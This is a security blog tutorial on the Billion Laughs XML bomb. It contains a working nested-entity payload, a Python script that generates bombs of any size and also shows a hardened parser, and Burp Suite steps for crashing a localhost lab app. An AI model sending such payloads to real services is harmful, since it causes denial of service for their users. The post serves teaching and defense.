Thursday, August 1, 2019

XML External Entities - Billion Laughs Attack - Part IV

XXE Attack -


Hi Techmates, this blog is all about the famous Billion Laughs attack. In this post we will look at what the attack is and how it leads to a Denial of Service (DoS), with a practical demonstration.

What is the Billion Laughs Attack?

The Billion Laughs attack is a type of Denial of Service (DoS) attack that targets XML parsers; it is also known as an XML bomb. The payload is well-formed XML and can pass XML schema validation, because entity expansion happens inside the parser before any schema is applied to the result.


For Example:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;">
]>
<lolz>&lol5;</lolz>


The example above declares five entities: lol, lol2, lol3, lol4 and lol5. lol expands to the string “lol”; lol2 contains four references to lol, lol3 contains four references to lol2, and so on up to lol5. The document body references lol5 only once. When the parser encounters &lol5; it expands it into four lol4s, each of which expands into four lol3s, and so on, until everything has been reduced to the text “lol”. With five levels and four references per level that single reference becomes 4^4 = 256 copies of “lol” (768 bytes) from a document of a few hundred bytes. The classic payload uses ten levels with ten references each, so the one reference in the body expands to 10^9 copies, roughly 3 GB of text from under a kilobyte of input; hence the name. Because the amount of expansion grows exponentially with the nesting depth, the parser exhausts memory or CPU long before it finishes, and that is the denial of service.
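As an added example (not code from the original post), the following Python script generalizes the payload above. It builds a bomb of any depth and fan-out (depth 5 with fan-out 4 reproduces the post's payload exactly; depth 10 with fan-out 10 is the classic form you would move to in Step 4 of the demo below), predicts the expanded size arithmetically so the bomb never has to be expanded to be measured, confirms that prediction on the small payload with an unhardened expat parser, and shows the standard-library defence: an expat EntityDeclHandler that refuses any entity declaration before the body is parsed, the same approach defusedxml takes. The function names and the "lol" seed string are this example's own choices.

```python
"""Billion Laughs payload generator, size predictor and a hardened parser.

Added example; only the Python standard library (xml.parsers.expat) is used.
"""
import xml.parsers.expat


def build_bomb(depth: int, fanout: int, seed: str = "lol") -> str:
    """Return an XML bomb in the form used in the post, generalized.

    depth=5, fanout=4 reproduces the post's payload (lol..lol5, four
    references per level); depth=10, fanout=10 is the classic form.
    """
    if depth < 1 or fanout < 1:
        raise ValueError("depth and fanout must be >= 1")
    names = ["lol"] + [f"lol{i}" for i in range(2, depth + 1)]
    decls = [f'<!ENTITY {names[0]} "{seed}">']
    for prev, name in zip(names, names[1:]):
        # each level holds `fanout` references to the level below it
        refs = f"&{prev};" * fanout
        decls.append(f'<!ENTITY {name} "{refs}">')
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE lolz [\n" + "\n".join(decls) + "\n]>\n"
        f"<lolz>&{names[-1]};</lolz>\n"
    )


def expanded_size(depth: int, fanout: int, seed: str = "lol") -> int:
    """Bytes of text the bomb expands to, computed without parsing it.

    Every level multiplies the reference count by `fanout`, so the single
    reference in the body becomes fanout**(depth-1) copies of `seed`.
    """
    return fanout ** (depth - 1) * len(seed)


def expand_with_expat(xml_text: str) -> str:
    """Parse with a plain expat parser and return the expanded text content.

    This is what an unhardened parser does: every entity reference is
    resolved and handed to the character-data handler. Only call it on
    small payloads; it is here to confirm the arithmetic above.
    """
    chunks = []
    parser = xml.parsers.expat.ParserCreate()
    parser.CharacterDataHandler = chunks.append
    parser.Parse(xml_text, True)
    return "".join(chunks)


class EntityDeclarationRejected(ValueError):
    """Raised when the hardened parser meets an entity declaration."""


def parse_without_entities(xml_text: str, forbid_dtd: bool = False) -> str:
    """Parse and return the root element name, refusing entity declarations.

    The EntityDeclHandler fires while the DOCTYPE is being read, before
    the body is seen, so nothing is ever expanded. With forbid_dtd=True
    any DOCTYPE at all is refused, which is the stricter setting.
    """
    def reject_entity(name, is_param, value, base, system_id, public_id, notation):
        raise EntityDeclarationRejected(f"entity declaration {name!r} refused")

    def reject_doctype(doctype_name, system_id, public_id, has_internal_subset):
        raise EntityDeclarationRejected(f"DOCTYPE {doctype_name!r} refused")

    seen = []

    def first_element(name, attrs):
        if not seen:
            seen.append(name)

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = reject_entity
    if forbid_dtd:
        parser.StartDoctypeDeclHandler = reject_doctype
    parser.StartElementHandler = first_element
    parser.Parse(xml_text, True)
    return seen[0]


def is_rejected(xml_text: str, forbid_dtd: bool = False) -> bool:
    """True if the hardened parser refuses the document."""
    try:
        parse_without_entities(xml_text, forbid_dtd)
    except EntityDeclarationRejected:
        return True
    return False


if __name__ == "__main__":
    small = build_bomb(5, 4)
    print(f"post's payload: {len(small)} bytes in, {expanded_size(5, 4)} bytes out")
    big = build_bomb(10, 10)
    print(f"classic 10x10: {len(big)} bytes in, {expanded_size(10, 10):,} bytes out")
    print("unhardened expat expanded", len(expand_with_expat(small)), "chars")
    print("hardened parser rejects the bomb:", is_rejected(small))
```

Note that the classic 10x10 payload is only measured here, never handed to expand_with_expat; the predictor is the safe way to size a suspect document, and refusing entity declarations up front is the safe way to parse one.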

Demo

For the demo we will use the same application that was used in XML External Entities - Inband - Part II. If you have not already set it up, visit that post for the setup instructions.


Step 1: Navigate to http://localhost/xxelab/penlab/ and fill in all the details as shown in Exhibit 1.

Exhibit 1

Step 2: Intercept the request using a proxy tool such as Burp Suite as shown in Exhibit 2.


Exhibit 2

Step 3: Replace the request body with the XML bomb above in Burp Suite as shown in Exhibit 3. The application responds with “lollol……”, the expanded copies of the entity, as expected.


Exhibit 3

Step 4: Add more entity levels to the DOCTYPE so that the expansion becomes large enough to exhaust the parser, turning it into a DoS, as shown in Exhibit 4.


Exhibit 4

Bingo!!! The application stops responding: the parser is tied up expanding the entities and the request never completes. Note that modern parsers cap entity expansion (libxml2 rejects documents that expand beyond its entity limits unless XML_PARSE_HUGE is set, and Expat 2.4.1 and later enforce an amplification limit), so the demo only works where those limits are absent or disabled. Run it only against a lab instance you own, since the exhausted parser process will take any other requests it serves down with it.


I hope you liked this post. If you have any queries, please leave a comment below. Like and share. Go through XML External Entities - SSRF - Part V to learn how to perform SSRF through XXE.

